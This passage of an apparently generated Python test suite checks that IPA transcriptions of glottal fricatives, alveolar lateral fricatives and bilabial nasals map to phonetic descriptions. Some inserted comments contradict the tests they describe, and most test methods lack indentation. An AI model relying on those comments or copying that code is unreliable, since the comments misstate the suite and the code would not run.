def test_h̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized glottal fricative pulmonic egressive consonant
def test_ɦʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰˠ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰˠ")
self.assertEqual(actual, expected)
def test_h̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized glottal fricative pulmonic egressive consonant
def test_ɦʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰˤ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰˤ")
self.assertEqual(actual, expected)
def test_h̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰˤ")
self.assertEqual(actual, expected)
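# NOTE: hedged aside, not part of the original suite. The voiceless
# variants above pair two distinct combining marks that can render almost
# identically: U+0325 COMBINING RING BELOW (h̥) and U+030A COMBINING RING
# ABOVE (h̊), while the voiced variants presumably use U+032C COMBINING
# CARON BELOW (h̬). unicodedata makes the distinction explicit when method
# names look the same on screen.
def test_voicing_diacritics_are_distinct_code_points(self):
    import unicodedata
    self.assertEqual(unicodedata.name("\u0325"), "COMBINING RING BELOW")
    self.assertEqual(unicodedata.name("\u030A"), "COMBINING RING ABOVE")
    self.assertEqual(unicodedata.name("\u032C"), "COMBINING CARON BELOW")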
# voiceless alveolar lateral fricative pulmonic egressive consonant
def test_ɬ_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ")
self.assertEqual(actual, expected)
def test_ɬ̊_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊")
self.assertEqual(actual, expected)
def test_ɬ̥_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥")
self.assertEqual(actual, expected)
def test_ɮ̊_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊")
self.assertEqual(actual, expected)
def test_ɮ̥_is_the_representation_of_the_voiceless_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʷ")
self.assertEqual(actual, expected)
def test_ɬ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊ʷ")
self.assertEqual(actual, expected)
def test_ɬ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥ʷ")
self.assertEqual(actual, expected)
def test_ɮ̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʷ")
self.assertEqual(actual, expected)
def test_ɮ̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʲ")
self.assertEqual(actual, expected)
def test_ɬ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊ʲ")
self.assertEqual(actual, expected)
def test_ɬ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥ʲ")
self.assertEqual(actual, expected)
def test_ɮ̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʲ")
self.assertEqual(actual, expected)
def test_ɮ̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar lateral fricative pulmonic egressive consonant
def test_ɬˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬˠ")
self.assertEqual(actual, expected)
def test_ɬ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊ˠ")
self.assertEqual(actual, expected)
def test_ɬ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥ˠ")
self.assertEqual(actual, expected)
def test_ɮ̊ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ˠ")
self.assertEqual(actual, expected)
def test_ɮ̥ˠ_is_the_representation_of_the_voiceless_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant
def test_ɬˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬˤ")
self.assertEqual(actual, expected)
def test_ɬ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̊ˤ")
self.assertEqual(actual, expected)
def test_ɬ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̥ˤ")
self.assertEqual(actual, expected)
def test_ɮ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ˤ")
self.assertEqual(actual, expected)
def test_ɮ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰ_is_the_representation_of_the_voiceless_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰʷ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰʲ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰˠ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant
def test_ɬʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬʰˤ")
self.assertEqual(actual, expected)
def test_ɮ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɮ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced alveolar lateral fricative pulmonic egressive consonant
def test_ɮ_is_the_representation_of_the_voiced_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ")
self.assertEqual(actual, expected)
def test_ɬ̬_is_the_representation_of_the_voiced_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬")
self.assertEqual(actual, expected)
# voiced labialized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʷ_is_the_representation_of_the_voiced_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʷ")
self.assertEqual(actual, expected)
def test_ɬ̬ʷ_is_the_representation_of_the_voiced_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʲ_is_the_representation_of_the_voiced_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʲ")
self.assertEqual(actual, expected)
def test_ɬ̬ʲ_is_the_representation_of_the_voiced_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized alveolar lateral fricative pulmonic egressive consonant
def test_ɮˠ_is_the_representation_of_the_voiced_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮˠ")
self.assertEqual(actual, expected)
def test_ɬ̬ˠ_is_the_representation_of_the_voiced_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized alveolar lateral fricative pulmonic egressive consonant
def test_ɮˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮˤ")
self.assertEqual(actual, expected)
def test_ɬ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ˤ")
self.assertEqual(actual, expected)
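# Note on the variant counts above: the voiceless groups test several
# spellings because the voiced letter ɮ can be devoiced with either ring
# below (U+0325) or ring above (U+030A), alongside the inherently voiceless
# letter ɬ, while the voiced groups built from ɬ have a single spelling,
# since only the caron below (U+032C) marks added voicing.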
# voiced aspirated alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰ_is_the_representation_of_the_voiced_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰ_is_the_representation_of_the_voiced_aspirated_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰʷ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰʲ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰˠ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant
def test_ɮʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮʰˤ")
self.assertEqual(actual, expected)
def test_ɮ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɮ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ɬ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_alveolar_lateral_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized alveolar lateral fricative pulmonic egressive consonant"
actual = describe_transcription("ɬ̬ʰˤ")
self.assertEqual(actual, expected)
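# The blocks above repeat one assertion pattern per spelling. A minimal
# sketch of a table-driven alternative using unittest's subTest; the helper
# name check_descriptions is hypothetical and not part of the original suite:
def check_descriptions(self, cases):
    # cases: iterable of (IPA transcription, expected description) pairs
    for transcription, expected in cases:
        with self.subTest(transcription=transcription):
            self.assertEqual(describe_transcription(transcription), expected)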
# voiceless bilabial nasal pulmonic egressive consonant
def test_m̊_is_the_representation_of_the_voiceless_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊")
self.assertEqual(actual, expected)
def test_m̥_is_the_representation_of_the_voiceless_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥")
self.assertEqual(actual, expected)
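# With the check_descriptions sketch above, the m̊ / m̥ pair could collapse to
# (illustrative only, not part of the generated suite):
#
#     self.check_descriptions([
#         ("m̊", "voiceless bilabial nasal pulmonic egressive consonant"),
#         ("m̥", "voiceless bilabial nasal pulmonic egressive consonant"),
#     ])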
# voiceless labialized bilabial nasal pulmonic egressive consonant
def test_m̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʷ")
self.assertEqual(actual, expected)
def test_m̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized bilabial nasal pulmonic egressive consonant
def test_m̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʲ")
self.assertEqual(actual, expected)
def test_m̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized bilabial nasal pulmonic egressive consonant
def test_m̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ˠ")
self.assertEqual(actual, expected)
def test_m̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized bilabial nasal pulmonic egressive consonant
def test_m̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ˤ")
self.assertEqual(actual, expected)
def test_m̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated bilabial nasal pulmonic egressive consonant
def test_m̥ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʰ")
self.assertEqual(actual, expected)
def test_m̊ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized bilabial nasal pulmonic egressive consonant
def test_m̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʰʷ")
self.assertEqual(actual, expected)
def test_m̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized bilabial nasal pulmonic egressive consonant
def test_m̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʰʲ")
self.assertEqual(actual, expected)
def test_m̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized bilabial nasal pulmonic egressive consonant
def test_m̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʰˠ")
self.assertEqual(actual, expected)
def test_m̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized bilabial nasal pulmonic egressive consonant
def test_m̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̥ʰˤ")
self.assertEqual(actual, expected)
def test_m̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m̊ʰˤ")
self.assertEqual(actual, expected)
# voiced bilabial nasal pulmonic egressive consonant
def test_m_is_the_representation_of_the_voiced_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("m")
self.assertEqual(actual, expected)
# voiced labialized bilabial nasal pulmonic egressive consonant
def test_mʷ_is_the_representation_of_the_voiced_labialized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʷ")
self.assertEqual(actual, expected)
# voiced palatalized bilabial nasal pulmonic egressive consonant
def test_mʲ_is_the_representation_of_the_voiced_palatalized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʲ")
self.assertEqual(actual, expected)
# voiced velarized bilabial nasal pulmonic egressive consonant
def test_mˠ_is_the_representation_of_the_voiced_velarized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized bilabial nasal pulmonic egressive consonant
def test_mˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mˤ")
self.assertEqual(actual, expected)
# voiced aspirated bilabial nasal pulmonic egressive consonant
def test_mʰ_is_the_representation_of_the_voiced_aspirated_bilabial_nasal_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial nasal pulmonic egressive consonant"
actual = describe_transcription("mʰ")
self.assertEqual(actual, expected)
